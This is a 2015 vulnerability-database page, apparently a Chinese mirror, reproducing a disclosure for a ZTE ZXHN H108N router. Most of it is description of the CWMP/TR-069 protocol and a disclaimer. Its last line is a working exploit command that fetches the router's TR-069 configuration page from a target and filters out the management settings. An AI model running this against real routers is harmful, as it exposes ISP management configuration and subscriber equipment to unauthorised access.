ZTE ZXHN H108N 3.3.0_MU CWMP Configuration Disclosure

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1041180 漏洞类型
发布时间 2015-10-06 更新时间 2015-10-06
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2015100041
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#  ZTE ZXHN H108N 3.3.0_MU CWMP configuration disclosure
#  
#  Copyright 2015 (c) Todor Donev 
#  todor.donev@gmail.com
#  http://www.ethical-hacker.org/
#  https://www.facebook.com/ethicalhackerorg
#  http://pastebin.com/u/hackerscommunity 
#
#  Model                             ZXHN H108N
#  Serial Number                     ZTEERFCD6K03762
#  Batch Number                      T1
#  Software Version                  V3.3.0_MU
#  Boot Loader Version               V1.0.0
# 
#  CWMP Description:
#  CWMP configuration is accessible only through the 
#  Administrator account. CWMP is a protocol widely 
#  used by ISPs worldwide for remote provisioning 
#  and troubleshooting subscribers' equipment.
#  It includes both a safe auto configuration and the 
#  control of other CPE management functions within 
#  an integrated framework. The protocol addresses 
#  the growing number of different Internet access 
#  devices such as modems, routers, gateways, as well 
#  as end-user devices which connect to the Internet, 
#  such as set-top boxes, and VoIP-phones. The TR-069 
#  standard was developed for automatic configuration 
#  and management of these devices by 
#  Auto  Configuration Servers (ACS).
#
#  Disclaimer:
#  This or previous program is for Educational
#  purpose ONLY. Do not use it without permission.
#  The usual disclaimer applies, especially the
#  fact that Todor Donev is not liable for any
#  damages caused by direct or indirect use of the
#  information or functionality provided by these
#  programs. The author or any Internet provider
#  bears NO responsibility for content or misuse
#  of these programs or any derivatives thereof.
#  By using these programs you accept the fact
#  that any damage (dataloss, system crash,
#  system compromise, etc.) caused by the use
#  of these programs is not Todor Donev's
#  responsibility.
#
#  Use at your own risk and educational 
#  purpose ONLY!

[todor@adamantium ~]$ GET "http://TARGET/net_tr069_basic_t.gch" | grep Transfer_meaning